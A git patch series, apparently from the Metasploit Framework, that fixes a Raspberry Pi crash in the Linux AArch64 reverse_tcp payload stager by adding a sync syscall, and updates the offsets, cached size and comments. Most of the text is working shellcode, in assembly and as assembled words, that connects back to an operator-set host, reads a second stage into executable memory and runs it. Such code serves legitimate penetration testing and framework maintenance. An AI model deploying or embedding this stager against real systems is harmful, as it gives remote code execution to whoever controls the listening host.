From 48763208143413c3fd008ea3e6dbb9a02796a0f2 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Wed, 12 Feb 2025 11:33:45 -0500 Subject: [PATCH 1/5] fix: add sync syscall after read to prevent sigill in raspberrypi --- .../linux/aarch64/stager_sock_reverse.s | 4 + .../stagers/linux/aarch64/reverse_tcp.rb | 114 +++++++++--------- 2 files changed, 63 insertions(+), 55 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index f8b354fbc5..1a9ef4fa2a 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -77,6 +77,10 @@ read_loop: svc 0 cmn x0, #0x1 beq failed + mov x2, x0 + mov x8, #0x51 + svc 0 + mov x0, x2 add x3, x3, x0 subs x4, x4, x0 bne read_loop diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index d1cdca6aa4..38c45fc41f 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -32,65 +32,69 @@ module MetasploitModule { 'Offsets' => { - 'LPORT' => [ 206, 'n' ], - 'LHOST' => [ 208, 'ADDR' ], + 'LPORT' => [ 212, 'n' ], + 'LHOST' => [ 224, 'ADDR' ], }, 'Payload' => [ # Generated from external/source/shellcode/linux/aarch64/stager_sock_reverse.s - 0xd2800040, # mov x0, #0x2 // #2 - 0xd2800021, # mov x1, #0x1 // #1 - 0xd2800002, # mov x2, #0x0 // #0 - 0xd28018c8, # mov x8, #0xc6 // #198 - 0xd4000001, # svc #0x0 - 0xaa0003ec, # mov x12, x0 - 0x100005a1, # adr x1, cc - 0xd2800202, # mov x2, #0x10 // #16 - 0xd2801968, # mov x8, #0xcb // #203 - 0xd4000001, # svc #0x0 - 0x350004c0, # cbnz w0, c0 - 0xaa0c03e0, # mov x0, x12 - 0xd10043ff, # sub sp, sp, #0x10 - 0x910003e1, # mov x1, sp - 0xd2800082, # mov x2, #0x4 // #4 - 0xd28007e8, # mov x8, #0x3f // #63 - 0xd4000001, # svc #0x0 - 0xb100041f, # cmn x0, #0x1 - 0x540003c0, # b.eq c0 - 0xb94003e2, # ldr w2, [sp] - 0xd34cfc42, # lsr x2, x2, #12 - 0x91000442, # add x2, x2, #0x1 - 0xd374cc42, # lsl x2, x2, #12 - 0xaa1f03e0, # mov x0, xzr - 0xaa0203e1, # mov x1, x2 - 0xd28000e2, # mov x2, #0x7 // #7 - 0xd2800443, # mov x3, #0x22 // #34 - 0xaa1f03e4, # mov x4, xzr - 0xaa1f03e5, # mov x5, xzr - 0xd2801bc8, # mov x8, #0xde // #222 - 0xd4000001, # svc #0x0 - 0xb100041f, # cmn x0, #0x1 - 0x54000200, # b.eq c0 - 0xb94003e4, # ldr w4, [sp] - 0xf90003e0, # str x0, [sp] - 0xaa0003e3, # mov x3, x0 - 0xaa0c03e0, # mov x0, x12 - 0xaa0303e1, # mov x1, x3 - 0xaa0403e2, # mov x2, x4 - 0xd28007e8, # mov x8, #0x3f // #63 - 0xd4000001, # svc #0x0 - 0xb100041f, # cmn x0, #0x1 - 0x540000c0, # b.eq c0 - 0x8b000063, # add x3, x3, x0 - 0xeb000084, # subs x4, x4, x0 - 0x54fffee1, # b.ne 90 - 0xf94003e0, # ldr x0, [sp] - 0xd63f0000, # blr x0 - 0xd2800000, # mov x0, #0x0 // #0 - 0xd2800ba8, # mov x8, #0x5d // #93 - 0xd4000001, # svc #0x0 - 0x5c110002, # .word 0x5c110002 - 0x0100007f, # .word 0x0100007f + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800021, # mov x1, #0x1 // #1 + 0xd2800002, # mov x2, #0x0 // #0 + 0xd28018c8, # mov x8, #0xc6 // #198 + 0xd4000001, # svc #0x0 + 0xaa0003ec, # mov x12, x0 + 0x10000621, # adr x1, dc + 0xd2800202, # mov x2, #0x10 // #16 + 0xd2801968, # mov x8, #0xcb // #203 + 0xd4000001, # svc #0x0 + 0x35000540, # cbnz w0, d0 + 0xaa0c03e0, # mov x0, x12 + 0xd10043ff, # sub sp, sp, #0x10 + 0x910003e1, # mov x1, sp + 0xd2800082, # mov x2, #0x4 // #4 + 0xd28007e8, # mov x8, #0x3f // #63 + 0xd4000001, # svc #0x0 + 0xb100041f, # cmn x0, #0x1 + 0x54000440, # b.eq d0 // b.none + 0xb94003e2, # ldr w2, [sp] + 0xd34cfc42, # lsr x2, x2, #12 + 0x91000442, # add x2, x2, #0x1 + 0xd374cc42, # lsl x2, x2, #12 + 0xaa1f03e0, # mov x0, xzr + 0xaa0203e1, # mov x1, x2 + 0xd28000e2, # mov x2, #0x7 // #7 + 0xd2800443, # mov x3, #0x22 // #34 + 0xaa1f03e4, # mov x4, xzr + 0xaa1f03e5, # mov x5, xzr + 0xd2801bc8, # mov x8, #0xde // #222 + 0xd4000001, # svc #0x0 + 0xb100041f, # cmn x0, #0x1 + 0x54000280, # b.eq d0 // b.none + 0xb94003e4, # ldr w4, [sp] + 0xf90003e0, # str x0, [sp] + 0xaa0003e3, # mov x3, x0 + 0xaa0c03e0, # mov x0, x12 + 0xaa0303e1, # mov x1, x3 + 0xaa0403e2, # mov x2, x4 + 0xd28007e8, # mov x8, #0x3f // #63 + 0xd4000001, # svc #0x0 + 0xb100041f, # cmn x0, #0x1 + 0x54000140, # b.eq d0 // b.none + 0xaa0003e2, # mov x2, x0 + 0xd2800a28, # mov x8, #0x51 // #81 + 0xd4000001, # svc #0x0 + 0xaa0203e0, # mov x0, x2 + 0x8b000063, # add x3, x3, x0 + 0xeb000084, # subs x4, x4, x0 + 0x54fffe61, # b.ne 90 // b.any + 0xf94003e0, # ldr x0, [sp] + 0xd63f0000, # blr x0 + 0xd2800000, # mov x0, #0x0 // #0 + 0xd2800ba8, # mov x8, #0x5d // #93 + 0xd4000001, # svc #0x0 + 0x5c110002, # .short 0x5c110002 + 0x0100007f # .word 0x0100007f ].pack("V*") } )) From d22ed19b021a70f726cbf4c3a1547450a625da33 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Wed, 12 Feb 2025 11:49:35 -0500 Subject: [PATCH 2/5] fix: fix port number offset --- modules/payloads/stagers/linux/aarch64/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index 38c45fc41f..8a3e4759fc 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule { 'Offsets' => { - 'LPORT' => [ 212, 'n' ], + 'LPORT' => [ 222, 'n' ], 'LHOST' => [ 224, 'ADDR' ], }, 'Payload' => From 4e5a21bfab0c8bd4c84bdf5996c9e18ddd708f2e Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 12 Feb 2025 13:40:34 -0600 Subject: [PATCH 3/5] Update payload cache size --- modules/payloads/stagers/linux/aarch64/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index 8a3e4759fc..2a60f033f4 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -15,7 +15,7 @@ ### module MetasploitModule - CachedSize = 212 + CachedSize = 228 include Msf::Payload::Linux::Aarch64::Prepends include Msf::Payload::Stager From 80b76e4f5f294df721048674bcaac00b96dc9680 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 14 Feb 2025 04:31:11 -0500 Subject: [PATCH 4/5] docs: add reference to the pull-request inside source --- .../source/shellcode/linux/aarch64/stager_sock_reverse.s | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index 1a9ef4fa2a..026caf3079 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -77,10 +77,10 @@ read_loop: svc 0 cmn x0, #0x1 beq failed - mov x2, x0 - mov x8, #0x51 - svc 0 - mov x0, x2 + mov x2, x0 # The 'sync' syscall was added to fix a strange bug in RaspberryPi 4 + mov x8, #0x51 # More information here: + svc 0 # https://github.com/rapid7/metasploit-framework/pull/19875 + mov x0, x2 # add x3, x3, x0 subs x4, x4, x0 bne read_loop From cdac13550bf393b91ec164c0945de3d47c571712 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Wed, 19 Feb 2025 03:57:36 -0500 Subject: [PATCH 5/5] fix: sync syscall comment --- .../source/shellcode/linux/aarch64/stager_sock_reverse.s | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index 026caf3079..7079a091b2 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -77,10 +77,10 @@ read_loop: svc 0 cmn x0, #0x1 beq failed - mov x2, x0 # The 'sync' syscall was added to fix a strange bug in RaspberryPi 4 - mov x8, #0x51 # More information here: - svc 0 # https://github.com/rapid7/metasploit-framework/pull/19875 - mov x0, x2 # + mov x2, x0 // The 'sync' syscall was added to fix a strange bug in RaspberryPi 4 + mov x8, #0x51 // More information here: + svc 0 // https://github.com/rapid7/metasploit-framework/pull/19875 + mov x0, x2 // add x3, x3, x0 subs x4, x4, x0 bne read_loop